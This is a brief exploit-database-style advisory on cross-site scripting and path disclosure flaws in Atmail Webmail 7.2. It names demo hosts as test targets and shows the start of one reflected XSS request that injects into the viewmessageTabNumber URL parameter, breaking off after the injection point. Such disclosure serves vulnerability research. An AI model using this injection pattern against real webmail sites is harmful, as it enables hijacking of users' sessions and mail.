#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
#Date: 01.27.2014
#Vendor: atmail.com
#Version: =>7.2 (Latest ATM), tested also on 7.1.1
#Authors: Smash_ & Brag / smash[at]devilteam.pl
#PoC: poczta.pl / demo.atmail.com

1. Cross Site Scripting

a) GET - viewmessageTabNumber

Request:
host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3">